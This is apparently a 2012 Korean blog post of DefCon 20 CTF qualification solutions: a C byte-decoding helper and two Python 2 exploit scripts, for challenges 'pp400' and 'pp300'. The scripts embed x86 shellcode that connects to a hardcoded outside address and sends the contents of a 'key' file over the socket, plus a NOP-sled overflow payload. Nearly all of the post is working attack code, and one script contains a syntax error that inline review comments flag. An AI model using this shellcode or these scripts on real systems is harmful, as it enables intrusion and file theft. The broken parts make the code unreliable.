challenge 02
2012. 7. 20. 06:38
#include <stdio.h> int main(int argc, char *argv[]) { char fname[] = "c:\\mac.h"; char buf[1024] = {0}; FILE* fp; int ret = 0; fp = fopen(fname, "r"); if (fp < 0) { printf("fopen error\n"); return -1; } ret = fread(buf,1,991, fp); printf("buf: %s\n\n", buf); __asm{ xor ecx, ecx mov edx, 1 lea eax, dword ptr buf xor ebx, ebx dec eax dec ecx #if 1 badcob: inc eax inc ecx mov bl, byte ptr ss:[eax] not bl mov byte ptr ss:[eax], bl cmp ecx, 0x3df jnz badcob #endif } printf("buf: %s\n", buf); fclose(fp); return 0; }
http://blog.oxff.net/posts/DefCon%2020%20CTF%20Qualifications%3A%20pp400-anvszwpmjdyizhsqgngq.html 참조.
#!/usr/bin/python2.6
#defcon 2012, pp400 exploit - badcob
# Python 2 script (print statements, str.encode('hex')); it will not run on
# Python 3 as written.
import socket,sys
import struct
import time


def rc4_initialize(key,x,y):
    """Build the 256-entry state table from a 16-byte key.

    The table starts as 255..0 and is mixed for 256 rounds using the
    caller-supplied x and y. NOTE(review): x is never advanced inside the
    loop, so every round mixes the same slot tmp[x] with key[x & 0xf];
    this is not the textbook RC4 key schedule -- presumably it mirrors the
    service's own variant, confirm against the original post.
    """
    tmp = range(255,-1,-1)
    for i in range(0, 256):
        y = (y + tmp[x] +(ord(key[x & 0xf]))) & 0xff
        tmp[x],tmp[y] = tmp[y], tmp[x]
    return tmp


def rc4_pop_key(tmp, x, y):
    """Advance the (x, y) state one step and return (keystream_byte, x, y).

    tmp is modified in place (one swap per call). NOTE(review): `&&` is
    not a Python operator, so this line is a SyntaxError as written; the
    other masks in the file use `& 0xff` -- this is most likely an
    extraction error in the post, verify against the original.
    """
    x = (x+1) & 0xff
    y = (y+tmp[x]) & 0xff
    tmp[x], tmp[y] = tmp[y], tmp[x]
    return tmp[(tmp[x]+tmp[y]) && 0xff], x, y


#shellcode
sc = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
sc += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
sc += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"

#stack address to overwrite
# NOTE(review): assigned but never read; the literal is repeated below.
stack_address = 0xbfbfe9fc

#make payload
# Pad to a multiple of 4 and split the byte string into little-endian dwords.
payload = []
sc += '\x90'
print len(sc)
while sc != '':
    payload.append(struct.unpack('<I', sc[:4])[0])
    sc = sc[4:]

#nop sled + shellcode
#0x42 : inc edx
# Front-pad with 0x90 dwords to 128 entries, then 120 dwords of 0x42, then
# the single address dword: 249 entries in total.
payload = [0x90909090 for i in range(0,128-len(payload))] + payload
payload += [0x42424242 for i in range(0,248-128)]
payload += [0xbfbfe9fc]

total_count = len(payload)
current_count = 0

#rc4 initialize
# `global` at module scope is a no-op; x, y and tmp are plain module
# variables that rc4_pop_key's return values below overwrite each step.
global tmp, x, y
x = 0
y = 0
key = '\xb6\x3d\x15\x3a\x04\x15\x69\x72\x45\xfe\xc2\x7f\x12\x78\xd7\x82'
tmp = rc4_initialize(key,x,y)
print tmp
print len(tmp)

#host, port
host = '192.168.74.134'
port = 4016


def init(host,port):
    """Open a TCP connection to host:port and return the socket."""
    b = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    b.connect((host,port))
    return b


s = init(host,port)
passwd = 'b366e2776ce9efff'+'\x0a'
s.send(passwd)
print s.recv(256)
sys.stdout.flush()

# For each dword: reinterpret it as a little-endian float, take its decimal
# text, XOR each character with one keystream byte (consumed last char
# first because the text is reversed before and after the loop), then send
# the result hex-encoded plus a newline.
for i in payload:
    print current_count, hex(i)
    data_list = []
    data = str(struct.unpack('<f', struct.pack('<I', i))[0])
    data = data[::-1]
    for j in data:
        value, x, y = rc4_pop_key(tmp, x, y)
        data_list.append(chr(ord(j) ^ value))
    data_list.reverse()
    data = ''.join(data_list)
    print data.encode('hex')
    # Bare except: any send failure ends the loop after printing the
    # offending dword and its encoded form.
    try:
        s.send(data.encode('hex')+'\x0a')
    except:
        print 'float error:', i, hex(i), '[+]' + data.encode('hex') + '[+]'
        break
    current_count += 1
#!/usr/bin/python2.6 #defcon 2012, pp300 exploit - badcob import socket, sys from struct import pack def make_connection(host,port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) return s def make_payload(scode): #padding 1 byte : shellcode length 79byte scode += "\x90" #move byte ptr ss:[ebp+x], shellcode 1 byte mov_byte_ptr = "\xc6\x45" tmp = '' count = 0 for x in scode: tmp += mov_byte_ptr + chr(count) + x count += 0x1 #call ebp call_ebp = "\xff\xd5\x90\xff" return tmp + call_ebp #shellcode scode = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F" scode += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F" scode += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80" host = "192.168.74.134" port = 7548 num = "3c56bc31268ac65f" + "\x0a" #make payload payload = make_payload(scode) s = make_connection(host,port) s.send(num) s.send(payload)